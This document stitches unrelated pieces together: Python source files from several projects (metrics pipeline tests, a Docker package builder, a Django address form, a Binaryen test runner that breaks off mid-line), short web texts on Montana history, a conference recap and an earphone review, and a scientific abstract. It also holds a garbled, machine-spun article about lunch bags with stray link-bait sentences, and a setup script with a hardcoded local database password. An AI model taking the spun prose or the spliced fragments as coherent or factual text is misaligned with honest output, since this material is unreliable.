Presbytery meeting, please e-mail Tammy Strickland with your reason for being absent.
import exceptions from mock import Mock, patch from unittest import TestCase from carbon import events, state from carbon.pipeline import Processor, run_pipeline from carbon.service import CarbonRootService, setupPipeline from carbon.tests.util import TestSettings class TestSetupPipeline(TestCase): def setUp(self): self.settings = TestSettings() self.root_service_mock = Mock(CarbonRootService) self.call_when_running_patch = patch('twisted.internet.reactor.callWhenRunning') self.call_when_running_mock = self.call_when_running_patch.start() def tearDown(self): self.call_when_running_patch.stop() state.pipeline_processors = [] events.metricReceived.handlers = [] events.metricGenerated.handlers = [] def test_run_pipeline_chained_to_metric_received(self): setupPipeline([], self.root_service_mock, self.settings) self.assertTrue(run_pipeline in events.metricReceived.handlers) def test_run_pipeline_chained_to_metric_generated(self): setupPipeline([], self.root_service_mock, self.settings) self.assertTrue(run_pipeline in events.metricGenerated.handlers) @patch('carbon.service.setupAggregatorProcessor') def test_aggregate_processor_set_up(self, setup_mock): setupPipeline(['aggregate'], self.root_service_mock, self.settings) setup_mock.assert_called_once_with(self.root_service_mock, self.settings) @patch('carbon.service.setupRewriterProcessor') def test_rewrite_processor_set_up(self, setup_mock): setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings) setup_mock.assert_called_once_with(self.root_service_mock, self.settings) @patch('carbon.service.setupRelayProcessor') def test_relay_processor_set_up(self, setup_mock): setupPipeline(['relay'], self.root_service_mock, self.settings) setup_mock.assert_called_once_with(self.root_service_mock, self.settings) @patch('carbon.service.setupWriterProcessor') def test_write_processor_set_up(self, setup_mock): setupPipeline(['write'], self.root_service_mock, self.settings) setup_mock.assert_called_once_with(self.root_service_mock, self.settings) def test_unknown_processor_raises_value_error(self): self.assertRaises( exceptions.ValueError, setupPipeline, ['foo'], self.root_service_mock, self.settings) @patch('carbon.service.setupRewriterProcessor', new=Mock()) def test_parses_processor_args(self): #XXX Patch doesnt work on this import directly rewrite_mock = Mock() Processor.plugins['rewrite'] = rewrite_mock setupPipeline(['rewrite:pre'], self.root_service_mock, self.settings) rewrite_mock.assert_called_once_with('pre') def test_schedules_pipeline_ready(self): setupPipeline([], self.root_service_mock, self.settings) self.assertTrue(self.call_when_running_mock.called)
It has been suggested that extracellular vesicles (EVs) can mediate crosstalk between hormones and metabolites within pancreatic tissue. However, the possible effect of pancreatic EVs on stem cell differentiation into pancreatic lineages remains unknown. Herein, human islet-derived EVs (h-Islet-EVs) were isolated, characterized and subsequently added to human induced pluripotent stem cell (iPSC) clusters during pancreatic differentiation. The h-islet-EVs had a mean size of 117±7 nm and showed positive expression of CD63 and CD81 EV markers as measured by ELISA. The presence of key pancreatic transcription factor mRNA, such as NGN3, MAFA and PDX1, and pancreatic hormone proteins such as C-peptide and glucagon, were confirmed in h-Islet-EVs. iPSC clusters were differentiated in suspension and at the end stages of the differentiation protocol, the mRNA expression of the main pancreatic transcription factors and pancreatic hormones was increased. H-Islet-EVs were supplemented to the iPSC clusters in the later stages of differentiation. It was observed that h-Islet-EVs were able to up-regulate the intracellular levels of C-peptide in iPSC clusters in a concentration-dependent manner. The effect of h-Islet-EVs on the differentiation of iPSC clusters cultured in 3D-collagen hydrogels was also assessed. Although increased mRNA expression for pancreatic markers was observed when culturing the iPSC clusters in 3D-collagen hydrogels, delivery of EVs did not affect the insulin or C-peptide intracellular content. Our results provide new information on the role of h-Islet-EVs in the regulation of insulin expression in differentiating iPSC clusters, and are highly relevant for pancreatic tissue engineering applications.
""" Some Main Functions """ ### INCLUDES ### import os import bottle import logging from tornado import ioloop from .common import CWD, TPL_FOLDER, OPTIONS_PARSER from .system import SystemSettings from .web import WebServer from .web.socket import WebsocketManager from .sleepy_mesh import SleepyMeshManager ### CONSTANTS ### AES_RESET_DELAY = 3.0 # seconds ### MAIN FUNCTION ### def main(system_options): """ Main function """ # Make some variables accessible to html templates global manager, system_settings, pages, users, snmp_agents, snmp_commands, snmp_traps # Set current working directory os.chdir(CWD) # print('CWD: {}'.format(CWD)) # Set default logging across all modules logging.basicConfig(level=logging.ERROR) # Set default bottle Template Path # del bottle.TEMPLATE_PATH[:] bottle.TEMPLATE_PATH.append(TPL_FOLDER) # Create and start Sleepy Mesh Manager (System Settings start modbus if it is enable) system_settings = SystemSettings(system_options) manager = SleepyMeshManager( system_settings=system_settings, websocket=WebsocketManager(), snmp_websocket=WebsocketManager() ) manager.start() # Forward SNMP Agents/Commands/Traps to templates snmp_agents = manager.snmp_server.agents snmp_commands = manager.snmp_server.commands snmp_traps = manager.snmp_server.traps # Create Web Server # Web server is a loop, sleepy mesh manager scheduler is based on the same loop as well web_server = WebServer(manager) # Share some variables with html templates variables pages = web_server.pages users = web_server.pages.users # Start Web Server web_server.start() # If we are here it means that program has been terminated, kill modbus server manager.modbus_server.stop() manager.snmp_server.stop() def reset_aes_settings(reset_complete_callback=None): """ Reset AES settings (if needed) """ global manager # Set current working directory os.chdir(CWD) # print('CWD: {}'.format(CWD)) # Set default logging across all modules logging.basicConfig(level=logging.ERROR) # Create System Options (system_options, args) = OPTIONS_PARSER.parse_args() # Disable modbus and snmp servers system_options.modbus_enable = False system_options.snmp_enable = False # Create and start Sleepy Mesh Manager system_settings = SystemSettings(system_options) manager = SleepyMeshManager( system_settings=system_settings, websocket=WebsocketManager(), snmp_websocket=WebsocketManager() ) # Dynamically creating AES reset function so we can incorporate delay def _aes_reset(): """ Nested AES Reset """ # Dynamically creating reset complete callback def _reset_complete_callback(): """ Nested Reset Complete Callback """ # Stopping Scheduler manager.stop_scheduler() # Stopping Tornado Server ioloop.IOLoop.instance().stop() if reset_complete_callback is not None: reset_complete_callback() manager.reset_network(complete_callback=_reset_complete_callback) # Monkey Patching Scheduler old_start_scheduler = manager.init_scheduler def monkey_patched_init_scheduler(): """ Monkey patching Init Scheduler to include AES Reset """ old_start_scheduler() manager.bridge.schedule(AES_RESET_DELAY, _aes_reset) manager.init_scheduler = monkey_patched_init_scheduler # Delete all active nodes nodes = manager.platforms.select_nodes('active').values() for node in nodes: manager.platforms.delete_node(node) node.delete() # Starting Scheduler manager.start() # Starting Tornado ioloop.IOLoop.instance().start()
Little Bighorn Battlefield National Monument memorializes the site of the Battle of the Little Bighorn, which took place on June 25-26, 1876. Explore the majestic landscape of this dramatic canyon. Experience the history these canyon walls hold. Step back in time to the era of the Fur Trade. This trading post on the upper Missouri has been preserved to look and feel like a hub for fur traders, explorers, and early settlers. This ranch used to be home to a 10 million acre cattle empire. Now, it commemorates the role of cattlemen in American history. Grab a pair of cowboy boots and experience the ranch life. Follow along the Missouri River to discover Lewis and Clark’s quest to find the Northwest Passage. See all the landmarks famous to their journey in Montana from the Gates of the Mountains to Pompey’s Pillar. The Nez Perce (Nimíipuu or Nee-Me-Poo) National Historic Trail passes through Montana and finds its end at the Bear Paw Battlefield near Chinook, Montana. This trail memorializes the flight of the Nez Pearce from their homeland. Brian D'Ambrosio lives in Helena, Montana. He has written more than 500 articles for publications as diverse as USA Today, High Country News, Sunset, The Smithsonian, and Backpacker Magazine. One of his most recent books, "Life in the Trenches," examined the complicated, rugged lives of legendary boxers, entertainment wrestlers, 1980s actors and contemporary musicians,and earned an independent book publishing award for nonfiction.
# -*- coding: utf-8 -*- ############################################################################## # # Author: Yannick Buron # Copyright 2015, TODAY Clouder SASU # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License with Attribution # clause as published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License with # Attribution clause along with this program. If not, see # <http://www.gnu.org/licenses/>. # ############################################################################## from openerp import models, api, modules class ClouderContainer(models.Model): """ Add methods to manage the mautic specificities. """ _inherit = 'clouder.container' @api.multi def deploy_post(self): super(ClouderContainer, self).deploy_post() if self.application_id.type_id.name == 'mautic': package_name = self.image_id.current_version + '.zip' self.execute( ['wget', '-q', 'https://s3.amazonaws.com/mautic/releases/' + package_name, ], path='/var/www/', username='www-data') self.execute(['unzip', package_name], path='/var/www', username='www-data') self.execute(['rm', package_name], path='/var/www', username='www-data') #INSTALLATION FROM SOURCE # self.execute( # ['git', 'clone', '--branch', self.image_id.current_version, 'https://github.com/mautic/mautic.git' # ], path='/var/www/', username='www-data') # self.execute( # ['composer', 'install'], path='/var/www/mautic', username='www-data') class ClouderBase(models.Model): """ Add methods to manage the mautic specificities. """ _inherit = 'clouder.base' @api.multi def deploy_build(self): """ Configure nginx. """ res = super(ClouderBase, self).deploy_build() if self.application_id.type_id.name == 'mautic': config_file = '/etc/nginx/sites-available/' + self.fullname self.container_id.send( modules.get_module_path('clouder_template_mautic') + '/res/nginx.config', config_file) self.container_id.execute(['sed', '-i', '"s/BASE/' + self.name + '/g"', config_file]) self.container_id.execute(['sed', '-i', '"s/DOMAIN/' + self.domain_id.name + '/g"', config_file]) self.container_id.execute(['ln', '-s', '/etc/nginx/sites-available/' + self.fullname, '/etc/nginx/sites-enabled/' + self.fullname]) self.container_id.execute(['/etc/init.d/nginx', 'reload']) return res @api.multi def purge_post(self): """ Purge from nginx configuration. """ super(ClouderBase, self).purge_post() if self.application_id.type_id.name == 'mautic': self.container_id.execute(['rm', '-rf', '/etc/nginx/sites-enabled/' + self.fullname]) self.container_id.execute([ 'rm', '-rf', '/etc/nginx/sites-available/' + self.fullname]) self.container_id.execute(['/etc/init.d/nginx', 'reload'])
93. Dylewski & Associates P.C. 102. The Law Office of Terisa Taylor, P.C.
#!/usr/bin/python import argparse import docker import json import logging import os import shutil import sys logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO) class zbuilder(): def __init__(self, config): js = json.load(config) self.docker_files = [] self.build_succeeded_file = "/tmp/build_succeeded" packages = js.get("packages") if not packages: logging.error("core: there is no 'packages' object, nothing to build") return logging.info("Starting parse different build types") for package_type, package in packages.items(): images = [] if package_type == "deb": img = js.get("deb-images") if img: images += img elif package_type == "rpm": img = js.get("rpm-images") if img: images += img else: logging.error("%s: unsupported package type", package_type) continue logging.info("%s: starting to parse commands", package_type) pre_build_commands = package.get("pre-build-commands") build_commands = package.get("build-commands") if build_commands: build_commands.append("echo success > %s" % (self.build_succeeded_file)) post_build = package.get("post-build-commands") final_commands = {} if post_build: pbs = post_build.get("success") if pbs: final_commands["success"] = pbs pbf = post_build.get("fail") if pbf: final_commands["fail"] = pbf pba = post_build.get("always") if pba: final_commands["always"] = pba sources = package.get("sources") if not sources: logging.error("%s: there is no 'sources' object, nothing to build", package_type) break for name, source in sources.items(): logging.info("%s/%s: starting to parse source", package_type, name) include_images = source.get("include-images") if include_images: images += include_images exclude_images = source.get("exclude-images") if exclude_images: tmp = [] for x in images: if x in exclude_images: continue tmp.append(x) images = tmp logging.info("%s/%s: images: %s", package_type, name, ', '.join(images)) fetch_commands = [] try: stype = source["type"] repo = source["repository"] branch = source.get("branch", "master") if stype == "git": fetch_commands.append("rm -rf %s" % (name)) fetch_commands.append("git clone %s %s" % (repo, name)) fetch_commands.append("cd %s" % (name)) fetch_commands.append("git checkout %s" % (branch)) build_commands.append("cd %s" % (name)) else: logging.error("%s/%s: unsupported source type '%s'", package_type, name, stype) continue except Exception as e: logging.error("%s/%s: invalid source: %s", package_type, name, e) continue logging.info("%s/%s: fetch commands: %s", package_type, name, ', '.join(fetch_commands)) commands = [] try: commands.append(pre_build_commands) commands.append(fetch_commands) commands.append(build_commands) except Exception as e: logging.notice("%s/%s: could not append command: %s", package_type, name, e) for image in images: df = self.generate_dockerfile(name, image, commands, final_commands) self.docker_files.append(df) def generate_dockerfile(self, name, image, commands, final_commands): df = "Dockerfile.%s.%s" % (name, image) with open(df, 'w+') as f: f.write("FROM %s\n" % (image)) f.write("ENV ZBUILDER_IMAGE=%s ZBUILDER_NAME=%s DEBIAN_FRONTEND=noninteractive\n" % (image, name)) f.write("ADD conf.d conf.d\n") for cmd_set in commands: cs = "RUN %s\n" % (' && \\\n'.join(cmd_set)) f.write(cs) success = final_commands.get("success") if success: cs = "RUN test -f %s && \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(success)) f.write(cs) fail = final_commands.get("fail") if fail: cs = "RUN test -f %s || \\\n %s\n" % (self.build_succeeded_file, ' && \\\n'.join(fail)) f.write(cs) always = final_commands.get("always") if always: cs = "RUN %s\n" % ' && \\\n'.join(always) f.write(cs) return df def run(self, name = None, build_dir = '.'): c = docker.Client(base_url='unix://var/run/docker.sock') for path in self.docker_files: if name and not name in path: continue try: shutil.rmtree(path="%s/" % build_dir, ignore_errors=True) os.mkdir("%s/" % build_dir) shutil.copy(path, "%s/" % build_dir) shutil.copytree("conf.d", "%s/conf.d" % build_dir) except Exception as e: logging.error("Could not copy local content to destination build dir %s: %s", build_dir, e) continue with open("%s.build.log" % (path), "w+") as out: response = c.build(path=build_dir, dockerfile=path, rm=False, pull=False, forcerm=False) for r in response: out.write(r) logging.info("%s: %s", path, r) if __name__ == '__main__': bparser = argparse.ArgumentParser(description='Builder arguments.', add_help=True) bparser.add_argument("--conf", dest='conf', action='store', type=argparse.FileType('r'), required=True, help='Input config file.') bparser.add_argument("--build-dir", dest='build_dir', action='store', default=".", help='Local directory where build process will run.') bparser.add_argument("--image", dest='image', action='store', help='Build only images containing this substring.') args = bparser.parse_args() try: zb = zbuilder(config=args.conf) try: zb.run(name=args.image, build_dir=args.build_dir) except Exception as e: logging.error("Could not run build, name: %s: %s", args.image, e) except Exception as e: logging.error("Could not create zbuilder object: %s", e)
A video has shown the moment a man gave his girlfriend a huge surprise as he proposed to her. The proposal happened publicly inside an air plane during their flight from Warri to the city of Lagos. In the video, the man is seen standing in front of his woman while making use of a public address system to make the proposal so that everyone aboard can hear him. ‘I never believed in love until I found you,’ the man said to his girlfriend who blushed shyly. He then went down on one knee and proposed to the woman to the huge admiration of the other passengers.
import logging from django.contrib.gis.geoip2 import GeoIP2 from django.views.generic import FormView from ipware.ip import get_real_ip from .forms import AddressForm # Initialize logger. logger = logging.getLogger(__name__) # Create your views here. class AddressFormView(FormView): template_name = 'addresses/address_form.html' success_url = '/' def get_form(self): ''' Get the Form object that will be supplied to the FormView's context. ''' # Instantiate Form. form = AddressForm(**self.get_form_kwargs()) # Determine the IP address associated to the HTTP Request. ip_address = get_real_ip(self.request) # Populate the form's `country` field with the user's apparent location. if ip_address and not form.is_bound: geo_ip2 = GeoIP2() location = geo_ip2.country(ip_address) form.fields['country'].initial = location['country_code'] return form class ShippingAddressFormView(AddressFormView): def form_valid(self, form): self.request.session['shipping_address'] = form.cleaned_data return super(ShippingAddressFormView, self).form_valid(form) class BillingAddressFormView(AddressFormView): def form_valid(self, form): self.request.session['billing_address'] = form.cleaned_data return super(BillingAddressFormView, self).form_valid(form)
This is the first time I’ve had an opportunity to attend the Health Analytics Summit, and the second year that Health Catalyst has hosted it. The event took place at the Grand America Hotel, in Salt Lake City, Utah. I’d like to thank Health Catalyst for choosing this location as it was very well delivered with high attention to detail by very courteous hotel staff. Attendance was sold out at just over 900 people and the energy from everyone was palpable. Just listening to the comments from other attendees during the event, it was easy to see many people went home with new understandings and a better grasp on where we are in the healthcare analytics world. If I were to describe every keynote speaker in detail, and every takeaway from the breakout sessions, this would be more of a book, and less of a blog. I’ll lay out the most resonant points that stuck with me, although there were many, many more that my fellow Galeneers and attendees shared. Day one was started with a keynote speech by Health Catalyst’s CEO Dan Burton. The kickoff was a warm welcome and prepared everyone for the days ahead. Dan also detailed some of the findings that health systems are facing today and the lessons learned by many along the way as they become more data-driven enterprises. There is a shortage of analysts, resulting in a high demand for people with analytical thinking skills. Getting buy-in across the organization, from leadership and staff to providers and nursing professionals is the key to success in any data-driven endeavor. The second keynote speaker of the day was Daryl Morey, Houston Rockets GM and Managing Director of Basketball Operations. Daryl took us through his experience and success using data about players to find, recruit, train and enable players to become a serious force in the NBA. Using analytics, the Rockets were able to study the strengths and weaknesses of each player on the team and use those insights to beat the Lakers repeatedly even though the Lakers had the ability to recruit more highly paid players. Daryl even shared with us his history with analytics, starting in high school, including his year book photo. The presentation was heavy on details, but conveyed with some humor mixed in resulting in an overall fantastic delivery. In basketball the two for one principle was proven to be the best option when applying years of statistical data. It’s better to take two bad shots than one good shot, every day, every time, in every game. Managers disagree, but they shouldn’t be the ones making the call, it should be left to those in the game, in the precious seconds that it matters to make the shots. Data gives you confidence. When making decisions others will challenge, having data-driven insights to support your decision and help refute arguments. Be careful how you use the data. Build confidence and experience, it can be used incorrectly. Since I have a background in business management and an avid curiosity in different management styles, I found the next speaker to be fascinating and a very powerful speaker. My fellow Galeneers that attended the event all agree that Jim Collins (Author of Built to Last, Good to Great, and Great by Choice) was a potent speaker and left a lasting impression. In fact, many of Jim’s points resonated throughout the remainder of the summit. Jim’s team researched not simply what made a company great, but given the same circumstances, what differentiates two companies when one is successful and one fails. In healthcare, as in business, good isn’t enough. We have to be GREAT. Set your bhag (Big Hairy Audacious Goal) so big it’s humbling and perceptibly impossible. It does not have to be obtainable, but you must embrace the challenge with humility. Some of the best leaders in the largest companies in the world are not charismatic. Charisma does not define a great leader, instead it may cripple them with over confidence. Great leaders exhibit intelligence, hard work and humility. Don’t confuse values with practices. Harness the 20 mile march. Every day, every time, with relentless dedication and perseverance. I could go further into that keynote as it struck many chords within my soul. It motivated me to embrace humility and a healthy paranoia to take ideas and transform them into solutions although the journey will be grueling and will likely encounter opposition along the way. But I won’t. I’ll just say this, take an opportunity to read more about the 20 mile march and how that might apply to your current situation. The breakout sessions and round table discussions were very well thought out and offered a peek into the experiences many health systems had, including the troubles faced along the way and the various lessons learned. Some sessions were more about the technology and where we are going, and some were focused on past experience. Big data is not an easily definable term. Many health systems like to believe they have big data, but it turns out, it’s more or less average. Big data and the technology around it is coming. Right now, it’s being researched and many companies and systems are evaluating how it will work with long term goals. We should see it become more prevalent in the next three years. Value based care isn’t just a new payment model. It’s the right thing to do. Community hospitals face intense pressure and must embrace a data-driven culture to remain solvent and provide quality care for the people depending on them for a future. Data governance is best when applied throughout the entire organization, ensuring everyone has a stake and the power of data isn’t locked away or controlled by a single operating unit. Physicians need to be not only engaged, they need to be champions of data and best practices. Pushing cohorts and staff to do the right thing, every time, no matter the circumstances. One of the final keynote speakers was Ed Catmull (Co-founder of Pixar, President of Pixar and Walt Disney Animation Studios). This was a fascinating session as it focused primarily on the art. Like animation, science is an art. Deriving insights from data isn’t easy and it takes people with an analytical mindset to look at data and recognize trends and paint a picture of actionable insights from that data. Ed also focused on what he refers to as the “Brain Trust”, a group of people with various backgrounds that meet to solve a problem or set of problems. These brain trusts are designed and assembled for each problem and group of problems, and once the problem is solved, the brain trust is dissolved. This is something I have studied in depth and hearing how Pixar applied this methodology was very interesting. It’s easy to state your goals, it’s hard to stand to them. Protect the crew that works on a new idea that didn’t work, new ideas are fragile. Separate decision making from the creative process. If you give a good idea to a bad team, they will screw it up. If you give a bad idea to a good team they will fix it or throw it away and come up with a new idea. There is no silver bullet. It takes a lot of work, from every facet of every organization, every day, to be successful. And when you have become great, don’t stop. Keep improving.
# -*- coding: utf-8 -*- """ profiling.sampling.samplers ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2014-2017, What! Studio :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import import functools import signal import sys import threading import weakref import six.moves._thread as _thread from profiling.utils import deferral, Runnable, thread_clock __all__ = ['Sampler', 'ItimerSampler', 'TracingSampler'] INTERVAL = 1e-3 # 1ms class Sampler(Runnable): """The base class for samplers.""" #: Sampling interval. interval = INTERVAL def __init__(self, interval=INTERVAL): self.interval = interval class ItimerSampler(Sampler): """Uses ``signal.ITIMER_PROF`` to sample running frames. .. note:: ``signal.SIGPROF`` is triggeres by only the main thread. If you need sample multiple threads, use :class:`TracingSampler` instead. """ def handle_signal(self, profiler, signum, frame): profiler.sample(frame) def run(self, profiler): weak_profiler = weakref.proxy(profiler) handle = functools.partial(self.handle_signal, weak_profiler) t = self.interval with deferral() as defer: prev_handle = signal.signal(signal.SIGPROF, handle) if prev_handle == signal.SIG_DFL: # sometimes the process receives SIGPROF although the sampler # unsets the itimer. If the previous handler was SIG_DFL, the # process will crash when received SIGPROF. To prevent this # risk, it makes the process to ignore SIGPROF when it isn't # running if the previous handler was SIG_DFL. prev_handle = signal.SIG_IGN defer(signal.signal, signal.SIGPROF, prev_handle) prev_itimer = signal.setitimer(signal.ITIMER_PROF, t, t) defer(signal.setitimer, signal.ITIMER_PROF, *prev_itimer) yield class TracingSampler(Sampler): """Uses :func:`sys.setprofile` and :func:`threading.setprofile` to sample running frames per thread. It can be used at systems which do not support profiling signals. Just like :class:`profiling.tracing.timers.ThreadTimer`, `Yappi`_ is required for earlier than Python 3.3. .. _Yappi: https://code.google.com/p/yappi/ """ def __init__(self, *args, **kwargs): super(TracingSampler, self).__init__(*args, **kwargs) self.sampled_times = {} self.counter = 0 def _profile(self, profiler, frame, event, arg): t = thread_clock() thread_id = _thread.get_ident() sampled_at = self.sampled_times.get(thread_id, 0) if t - sampled_at < self.interval: return self.sampled_times[thread_id] = t profiler.sample(frame) self.counter += 1 if self.counter % 10000 == 0: self._clear_for_dead_threads() def _clear_for_dead_threads(self): for thread_id in sys._current_frames().keys(): self.sampled_times.pop(thread_id, None) def run(self, profiler): profile = functools.partial(self._profile, profiler) with deferral() as defer: sys.setprofile(profile) defer(sys.setprofile, None) threading.setprofile(profile) defer(threading.setprofile, None) yield
The SoundMagic E10C offers you great sound that is reasonably well balanced, with just the right amount of thump. You can rest assured that you are getting great per unit performance for every rupee you are investing. However, if we are to compare them to similarly priced IEMs, say for example the newly released Tekfusion Twinwoofers M2, then objectively, the Tekfusion Twinwoofers M2 is a slightly better buy in terms of pure audio performance. But the two are so close in their performance that you can almost substitute one for the other depending on which one is more easily available. Your decision can sway in favour of the SoundMagic E10C on ancillary factors too such as the availability of a computer adapter included in the bundle – if that’s an important consideration for you. Or even the three button remote as opposed to the single button one found on the Twinwoofers. The choice is simple. Though if you are still confused read on. We’ve been fans of SoundMagic’s E10 series for a long time now. In fact the E10 to us was a far better series than the overrated PL30s. The E10M was for a long time our go-to recommendation for the ₹2000 to ₹2500 price bracket. Soon the E10S came along with its dual wiring which would let you switch between iOS and Android button compatibility with the flick of a switch near the headphone jack. The E10S also improved on the flimsy cables that the E10M came with. Further with the M to S, there was also a slight change in the sound signature. Now, with the relatively recent release of the E10C, what’s changed? Let’s find out, starting with the look and feel. In terms of design, the driver housing looks exactly like the E10M while the cable is the one used on the E10S. The internal wiring is different though. The E10C has a 3-button remote that can automatically switch between Apple and Android smartphones – a pretty neat featyre and apparently a first in this space. It’s like they took the E10S and changed its cable to have a better remote and an angled input jack. The build quality is quite decent, something you'd expect from a headphone in this price range. Between the E10C and it’s predecessor the E10S there is no difference in sound signature. It’s the same vibrant signature that we’ve come to love over the ages (especially given that it comes at such an affordable price point). The question, therefore, isn’t which E10 sounds better (it’s the E10M in case you were wondering), the question is, how does the E10C compare to the other similarly priced IEMs we've reviewed recently. When we had the E10C with us, we also had the newly launched Tekfusion Twinwoofers M2. To put our in-ear headphones through their paces properly, we added a few more tracks to our standard mix in order to have a representation across genres. The tracks had a sampling rate of at least 96 kHz (some even 192 kHz when available) and a bit depth of 24 bits (as opposed to the standard bit depth of 16 bits) and were played through the Fiio X5 3rd gen player. With a fair amount of listening, we find that the locally designed Tekfusion Twinwoofers M2 inches ever so slightly ahead of the Japanese competition. The audio sounds crip, vibrant and surprisingly neutral (again with the caveat of "for this price point"). Ok so the Twinwoofer M2 is a little ahead in terms of pure audio performance. Does that mean the SoundMagic E10C is bad? Of course not! In fact, with the compatibility enhanced wiring and now three button remote it’s an improvement over the older version. The sound is great and some of the same problems like the recessed vocals and less finesse in the high end carry forward but they are minor niggles. You'd do well do pick these up. need a earphone compatible with gogear under 3.5k.
#!/usr/bin/python # -*- coding: utf-8 -*- import psycopg2 import sys con = None try: con = psycopg2.connect(host="localhost", dbname="solomon_db", user="solomon_user", password="solomon") cur = con.cursor() cur.execute('CREATE EXTENSION IF NOT EXISTS "uuid-ossp"') cur.execute('DROP TABLE IF EXISTS log_visit') cur.execute(r'''CREATE TABLE log_visit(visitor_number SERIAL NOT NULL, visitor_id UUID NOT NULL PRIMARY KEY, visitor_country TEXT NOT NULL, visitor_city TEXT NOT NULL, visitor_first_action_time TIMESTAMP WITH TIME ZONE NOT NULL, visitor_last_action_time TIMESTAMP WITH TIME ZONE NOT NULL, visitor_returning BOOLEAN NOT NULL, visit_count SMALLINT NOT NULL, referer_url TEXT, referer_keyword TEXT, config_os CHAR(10) NOT NULL, config_browser_name CHAR(15) NOT NULL, config_browser_version CHAR(20) NOT NULL, config_resolution CHAR(9) NOT NULL, location_ip CIDR )''') cur.execute('DROP TABLE IF EXISTS log_metrics') cur.execute(r'''CREATE TABLE log_metrics(daily_date DATE NOT NULL PRIMARY KEY DEFAULT CURRENT_DATE, daily_bit_array BIT VARYING NOT NULL DEFAULT '0' )''') cur.execute('DROP TABLE IF EXISTS log_websocket') cur.execute(r'''CREATE TABLE log_websocket(websocket_use_id SERIAL NOT NULL PRIMARY KEY, visitor_id UUID NOT NULL REFERENCES log_visit(visitor_id) )''') con.commit() finally: if con: con.close()
The Lunch Bag has actually been used by thousands globally dating to ages ago until today. Get further on a related encyclopedia - Click here: Personalized Wedding Favors Sharing Your Joy | Icarlygames. Via the years it has developed in to being a lot more functional in design that now we have lunch time bags that keep our food warm and even chilled. We discovered like us on facebook by browsing Bing. Lunch time bags accustomeded to be that aged brown paper bag and previously some individuals are still using this. The brownish paper bag provides the advantage of the holder being able to toss it when the contents have actually been cleared out. With the development of much better lunch time bags and the issue for the setting (since paper bags come from plants) the brownish paper lunch bag has taken a backseat in a lot of homes. We have so many available kinds of lunch bags that are currently swamping the marketplace. To get extra information, consider having a look at: company web site. They are available in a variety of layout and design. We have the soft lunch boxes that are either oblong or square in form usually made from either vinyl or plastic. We also have canvas lunch time bags made from cotton that is machine washable so it could be made use of repeatedly again. This allows us to conserve money for we no longer have to equip on lunch bags that are non reusable. These are extremely long lasting and we aid do away with the use of lots of paper or plastic bags. The protected lunch time bag would certainly be the most effective of them all. Whats fantastic regarding this is that it keeps meals fresh completely to the time when we consume them on lunch. As a result of this our meals does not obtain mushy and they try as if they were freshly prepared. These shielded bags may be made from nylon fabric although those in specialized materials like tapestry are likewise offered. Some shielded lunch bags even now come with these unique gel groups that are iced up then consisted of guaranteed with the food to keep it chilled. Kids will certainly delight in holding their lunch time bags to school with the different shades, styles, and layouts. You could discover lunch time bags with animation characters, animal designs and whatever designs that are very appealing to the younger generation. The wonderful point also is that there are great deals of lunch time bags that can be tailored. This aids steer clear of complication on having actually lunches mixed up which used to be issue with paper bags. Eating lunch time ought to be a satisfying meal. If you prefer your lunch meals to try as if its from mothers great old kitchen area obtain yourself an excellent lunch time bag..
#!/usr/bin/env python3 # # Copyright 2015 WebAssembly Community Group participants # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import glob import os import subprocess import sys import unittest from collections import OrderedDict from scripts.test import binaryenjs from scripts.test import lld from scripts.test import shared from scripts.test import support from scripts.test import wasm2js from scripts.test import wasm_opt def get_changelog_version(): with open(os.path.join(shared.options.binaryen_root, 'CHANGELOG.md')) as f: lines = f.readlines() lines = [l for l in lines if len(l.split()) == 1] lines = [l for l in lines if l.startswith('v')] version = lines[0][1:] print("Parsed CHANGELOG.md version: %s" % version) return int(version) def run_version_tests(): print('[ checking --version ... ]\n') not_executable_suffix = ['.txt', '.js', '.ilk', '.pdb', '.dll', '.wasm', '.manifest', 'binaryen-lit'] bin_files = [os.path.join(shared.options.binaryen_bin, f) for f in os.listdir(shared.options.binaryen_bin)] executables = [f for f in bin_files if os.path.isfile(f) and not any(f.endswith(s) for s in not_executable_suffix)] executables = sorted(executables) assert len(executables) changelog_version = get_changelog_version() for e in executables: print('.. %s --version' % e) out, err = subprocess.Popen([e, '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() out = out.decode('utf-8') err = err.decode('utf-8') assert len(err) == 0, 'Expected no stderr, got:\n%s' % err assert os.path.basename(e).replace('.exe', '') in out, 'Expected version to contain program name, got:\n%s' % out assert len(out.strip().splitlines()) == 1, 'Expected only version info, got:\n%s' % out parts = out.split() assert parts[1] == 'version' version = int(parts[2]) assert version == changelog_version def run_wasm_dis_tests(): print('\n[ checking wasm-dis on provided binaries... ]\n') for t in shared.get_tests(shared.options.binaryen_test, ['.wasm']): print('..', os.path.basename(t)) cmd = shared.WASM_DIS + [t] if os.path.isfile(t + '.map'): cmd += ['--source-map', t + '.map'] actual = support.run_command(cmd) shared.fail_if_not_identical_to_file(actual, t + '.fromBinary') # also verify there are no validation errors def check(): cmd = shared.WASM_OPT + [t, '-all'] support.run_command(cmd) shared.with_pass_debug(check) def run_crash_tests(): print("\n[ checking we don't crash on tricky inputs... ]\n") for t in shared.get_tests(shared.get_test_dir('crash'), ['.wast', '.wasm']): print('..', os.path.basename(t)) cmd = shared.WASM_OPT + [t] # expect a parse error to be reported support.run_command(cmd, expected_err='parse exception:', err_contains=True, expected_status=1) def run_dylink_tests(): print("\n[ we emit dylink sections properly... ]\n") dylink_tests = glob.glob(os.path.join(shared.options.binaryen_test, 'dylib*.wasm')) for t in sorted(dylink_tests): print('..', os.path.basename(t)) cmd = shared.WASM_OPT 